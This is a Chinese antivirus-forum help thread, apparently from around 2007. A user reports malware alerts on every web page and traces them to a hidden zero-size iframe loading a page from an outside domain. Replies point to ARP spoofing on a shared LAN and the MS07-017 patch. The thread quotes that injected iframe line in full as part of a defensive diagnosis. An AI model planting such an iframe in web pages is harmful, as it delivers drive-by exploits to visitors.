瑞星卡卡安全论坛

很郁闷啊,不知道怎么会事,打开所有网页都会出现这个病毒,经过几天的搜集,我发现经常出现的有三个,是瑞星定义名称

1:Trojan.DL.JS.Agent.lii
2:Hack.Exploit.Vml.l
3:Hack.SuspiciousAni

谁遇到过这毒,是如何解决的,求助 谢谢了

收获:后来我查看网页源文件,发现顶部有框架代码,如下

<iframe src='http://www.832821.cn/rrr.htm' width=0 height=0></iframe>

原来是这个网站带搞鬼.我已经提交给瑞星了,不知道什么时候能解决

[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

附件: 3895012007728195807.jpg

关闭IE--清空IE临时文件

没用的~~我都清理了N次了 ,超级兔子都请出来清理过了，还是没用

难道就让这毒继续在我的电脑上继续猖獗下去,瑞星只看出毒名,却没有除根的办法,郁闷死

我不是高手，因为高手都不发言，呵呵。
我觉得可能和局域网有关，你可以试试用单独线路的ADSL上网看看，会不会还有这个报警出来

没有关系,已经被瑞星拦在门外了.

引用:

【hotfighter的贴子】没有关系,已经被瑞星拦在门外了. ………………

是被拦截了.但每开一个页面就跳这玩意出来,看着就不舒服 还麻烦,崩溃中

你是局域网？

是局域网~我租的房子 宽带是房东带的,上网的应该很多,这个毒难道是跟局域网有关.在安全模式下找不到病毒

我公司也是这样，高手出来帮帮忙呢（注：也是局域网）

打开所有网站都会报毒，估计是病毒利用ARP，在数据包中添加代码，使得局域网内的每台机都会连接到特定的网站.必须每台机都检查以下有没有毒，不一定是你台机的问题。

Hack.SuspiciousAni是你访问的某个网站的问题，那个网站不维护，你每上一次就会报一次。只要打好补丁，不管有没有报，都不会有事。

我们已经都打好补丁了，问题是只要出现病毒，网页就打不开呀

我所有的补丁都打了,清理COOKIES没用

下载 System Repair Engineer，
http://www.kztechs.com/sreng/download.html
1 解压缩sreng2.zip
2 运行SREng.exe
3 智能扫描=》扫描=》保存报告
4 把日志中的报告完整拷贝贴上来，不要修改
日志一次发不完，请分次发上来

引用:

【斌飞扬的贴子】是局域网~我租的房子 宽带是房东带的,上网的应该很多,这个毒难道是跟局域网有关.在安全模式下找不到病毒 ………………

arp欺骗，需要找出中毒的主机

知识库编号： RSV0706695
内容分类： 木马病毒

适用产品分类：瑞星杀毒软件.单机版.标准版.2007
瑞星杀毒软件.单机版.升级版.2007
瑞星杀毒软件.单机版.下载版.2007
关键词： Hack.SuspiciousAni;MS07-017


　　问题症状：瑞星监控经常提示有Hack.SuspiciousAni病毒，怎么回事？


　　
原理：
Hack.SuspiciousAni是指利用微软MS07-017漏洞的畸形ANI文件。由于操作系统没有安装微软MS07-017补丁，所以用户在上网时，会被一些网页中的恶意代码，或者某些病毒采用的特殊手段强行写入这些畸形ANI文件，此时就会出现瑞星监控提示发现Hack.SuspiciousAni病毒的情况。

解决方法：
1、将操作系统的补丁打全，尤其是微软的MS07-017补丁。
2、关闭全部浏览器，然后清空IE临时文件夹。
清空IE临时文件夹方法：打开IE浏览器，在菜单中选择【工具】－【Internet选项】，在“常规”选项卡中，点击“删除文件按钮”，当弹出“删除文件”对话框，请勾选“删除所有脱机内容”，并点击“确定”按钮。


微软MS07-017补丁链接：
http://www.microsoft.com/china/technet/security/bulletin/MS07-017.mspx

一定要再下载这个补丁，因为你的补丁程序可能出错了！！！